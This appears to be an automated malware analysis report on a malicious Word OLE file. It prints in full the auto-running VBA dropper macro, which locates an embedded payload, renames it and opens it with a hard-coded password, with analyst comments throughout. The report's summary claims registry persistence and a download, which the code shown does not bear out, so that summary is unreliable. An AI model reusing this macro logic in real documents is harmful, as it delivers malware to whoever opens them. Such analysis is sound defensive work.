Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 25096f7db07b9b88…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 328.0 KB
Created: 2021-09-22 10:46:00
First seen: 2021-10-01
MD5: 1c500101ff04f5d4a0577db3e3ec88df
SHA-1: 2b4709982451cb41e6e4fd4c03bb062bd4745027
SHA-256: 25096f7db07b9b887a0c4041642c6665736e1c7b16c64020a99f901774870dac
Risk Score: 72

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.005 Command and Scripting Interpreter: Visual Basic

The sample contains a VBA macro that is triggered by the Document_Open event. This macro attempts to exploit a vulnerability using an embedded EMF object and also tries to create a registry key for persistence. The macro's logic suggests it's designed to download and execute a secondary payload, although the specific download URL is obfuscated. The presence of the EMF object and the Document_Open macro strongly indicate exploitation for client execution.

Heuristics (5)

  • Office EPRINT stream contains EMF object (severity: high; CVE related; rule: OLE_EPRINT_EMF_OBJECT)
    The OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and counts as Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    The document contains VBA macro code.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    A Document_Open macro runs automatically when the document is opened. Matched line in script: Private Sub Document_Open()
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All four URLs below are Office and OOXML XML-namespace identifiers (three of them from the Office encryption schema), not network indicators.
    • http://schemas.microsoft.com/office/2006/encryption (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/password (in document text, OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/certificate (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis. The Ole10Native payload's declared drop path (C:\Users\MyPc\AppData\Local\Temp\diplo.ioe) matches the file name the macro below searches for, renames to diplo.doc in the user templates folder, and opens with a hard-coded document password.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3295 bytes
SHA-256: ab0a07553c2841a74e3ba9d7b1f5c48a5af800dda3fc2f0fa3c0d780a05dba11
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
Dim hdv As String
Dim bbbb As String
Dim med As String

' Analyst note: Document_Open runs automatically when the document is opened.
' The fragments passed to s1/s2 and built here assemble the strings "Local/Temp"
' and "diplo.doc" so that neither appears literally in the source.
Private Sub Document_Open()
Dim dfgdgdg
Call s1("Lo")

Dim abrakadabra As String
abrakadabra = "o"
Call s2("cal/")
abrakadabra = abrakadabra & "c"
Dim kytrewwf As String
' Analyst note: kytrewwf is the user's Word templates folder.
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)

If Dir(kytrewwf & "\diplo.d" & abrakadabra) = "" Then
    ' Analyst note: bvxfcsd locates the dropped payload and stores its path in hdv;
    ' nam moves it to <templates>\diplo.doc and pppx opens it with a hard-coded password.
    Call bvxfcsd
    If Len(hdv) > 2 Then
        Call nam(hdv, kytrewwf)
        Call pppx(kytrewwf & "\diplo.d" & abrakadabra)
    End If
End If
End Sub

' Analyst note: wrapper around the recursive Search in Module123345. Only MyFSO is
' used; the other declarations are filler. hdv is passed ByRef and receives the
' path of the payload file.
Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject

Call Search(MyFSO.GetFolder(asda), hdv)

End Sub

Attribute VB_Name = "Module1"

' Analyst note: opens the renamed payload as a Word document using the
' hard-coded document password "2281337".
Sub pppx(spoc As String)
Dim lkvc As String
lkvc = spoc
    Documents.Open FileName:=lkvc, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="2281337", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub

Attribute VB_Name = "Module3"
Dim vv1, vv2, vv3, vv4, fafaa As String

' Analyst note: s1/s2/s3 are setters for split string fragments. Document_Open
' passes "Lo" and "cal/", bvxfcsd adds "Te" and "mp", so vv1 & vv2 & vv3 & vv4
' evaluates to "Local/Temp".
Sub s1(vi As String)
vv1 = vi
End Sub
Sub s2(vi As String)
vv2 = vi
End Sub
Sub s3(vi As String)
vv3 = vi
End Sub
Sub bvxfcsd()
vv3 = "Te"
' Analyst note: the cursor movements and Copy act on the document body. The
' carved Ole10Native package listed below declares full_path
' C:\Users\MyPc\AppData\Local\Temp\diplo.ioe, the file this routine then looks for.
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
Selection.Copy
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)

    ntgs = 50
sda = 49

vv4 = "mp"
Dim kuls As String
kuls = vv1 & vv2 & vv3 & vv4
fafaa = kuls
' Analyst note: the loop shortens the templates path (typically
' %APPDATA%\Microsoft\Templates) one character at a time until
' <prefix> & "Local/Temp" names an existing directory, i.e. it derives
' %LOCALAPPDATA%\Temp without spelling it out. sda = 61 ends the loop on the first hit.
While sda < 50
      ntgs = ntgs - 1
      If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then
    Else
   sda = 61
    End If
   Wend
   Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & fafaa)
End Sub

Attribute VB_Name = "Module123345"
Dim pls As String

' Analyst note: recursive directory walk. fffff is assembled as "diplo.ioe";
' pafs is passed ByRef (it is hdv in ThisDocument), so assigning the matching
' File object stores its Path for Document_Open. The ErrHandle label is never
' reached because there is no On Error GoTo statement.
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
 Dim siplo As String
siplo = "o"
siplo = siplo & "e"
    Dim Ters As Object
  Dim fffff
  fffff = "diplo.i" & siplo
For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc

   For Each Ters In mds.Files
   If Ters.Name = fffff Then
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   Err.Clear
End Sub

' Analyst note: ousx and uoia only copy the templates path into pls; Name then
' moves the located diplo.ioe to <templates>\diplo.doc ("\diplo.d" & "o" & "c").
Sub nam(pafs As String, aaaa As String)
Call ousx(aaaa)
Dim abrakadabra As String
abrakadabra = "o"

Dim oxl
oxl = "\diplo.d" & abrakadabra & "c"
Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
pls = fffs
End Sub

Sub ousx(aaaa As String)
Call uoia(aaaa)
End Sub
Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1693787468/Ole10Native
Size: 160568 bytes
SHA-256: c2ed486a1563a41ad697f56b359c80c8a8dd2d64afef3662263f66543d24d880
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact entropy is 7.96, consistent with packed or encrypted content)

Filename: ole10native_00_diplo.ioe
Kind: ole-package-payload
Source: OLE Ole10Native payload: ObjectPool/_1693787468/Ole10Native; display_name=diplo.ioe; full_path=C:\Users\MyPc\AppData\Local\Temp\diplo.ioe; temp_path=; def_file=
Size: 160256 bytes
SHA-256: 9cdf5ffc3cf543be8ee9bdd2eeabbdca2fee33eaa905f54380d200daf2d5ecbe
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact entropy is 7.96, consistent with packed or encrypted content)